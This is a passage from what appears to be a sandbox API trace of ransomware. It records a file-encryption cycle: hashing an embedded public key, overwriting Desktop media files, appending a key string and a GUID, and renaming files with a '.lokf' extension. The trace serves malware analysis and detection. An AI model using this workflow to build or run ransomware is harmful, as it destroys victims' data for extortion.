KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.598] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.598] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.598] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.598] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.598] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.598] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.598] GetLastError () returned 0x0 [0058.598] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.599] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.599] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.599] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.599] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc510) returned 0x9c82710 [0058.599] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298f08 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aef0 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298f50 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af08 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af38 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af50 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.599] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af38 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af50 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af50 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6af38 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af50 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af38 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.600] GetCurrentThreadId () returned 0x9e0 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c3230 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.601] GetCurrentThreadId () returned 0x9e0 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af38 [0058.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0058.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af50 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af20 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af68 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af38 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af38 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af38 | out: hHeap=0x660000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.603] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x32679f8 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32679f8 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af68 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af50 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af20 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af08 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298f50 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0058.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.604] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c82710*, nNumberOfBytesToWrite=0xc50f, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c82710*, lpNumberOfBytesWritten=0x9f4fb14*=0xc50f, lpOverlapped=0x0) returned 1 [0058.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0058.604] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc514, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.604] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.604] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.604] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.604] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.604] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.604] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.604] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.604] CloseHandle (hObject=0x5cc) returned 1 [0058.605] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.605] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.605] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.605] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h5XCQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h5xcq.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h5XCQ.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h5xcq.mkv.lokf")) returned 1 [0058.606] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.606] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.606] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.607] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.607] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9f64460, ftCreationTime.dwHighDateTime=0x1d4d280, ftLastAccessTime.dwLowDateTime=0x8c733cb0, ftLastAccessTime.dwHighDateTime=0x1d4cb58, ftLastWriteTime.dwLowDateTime=0x8c733cb0, ftLastWriteTime.dwHighDateTime=0x1d4cb58, nFileSizeHigh=0x0, nFileSizeLow=0x79e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I9YVy1.mp3", cAlternateFileName="")) returned 1 [0058.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.607] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.607] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I9YVy1.mp3") returned=".mp3" [0058.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I9YVy1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i9yvy1.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.607] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=1950) returned 1 [0058.607] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.609] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x778, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.609] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.610] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.610] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x79e, lpOverlapped=0x0) returned 1 [0058.610] lstrlenA (lpString="-----BEGIN PUBLIC 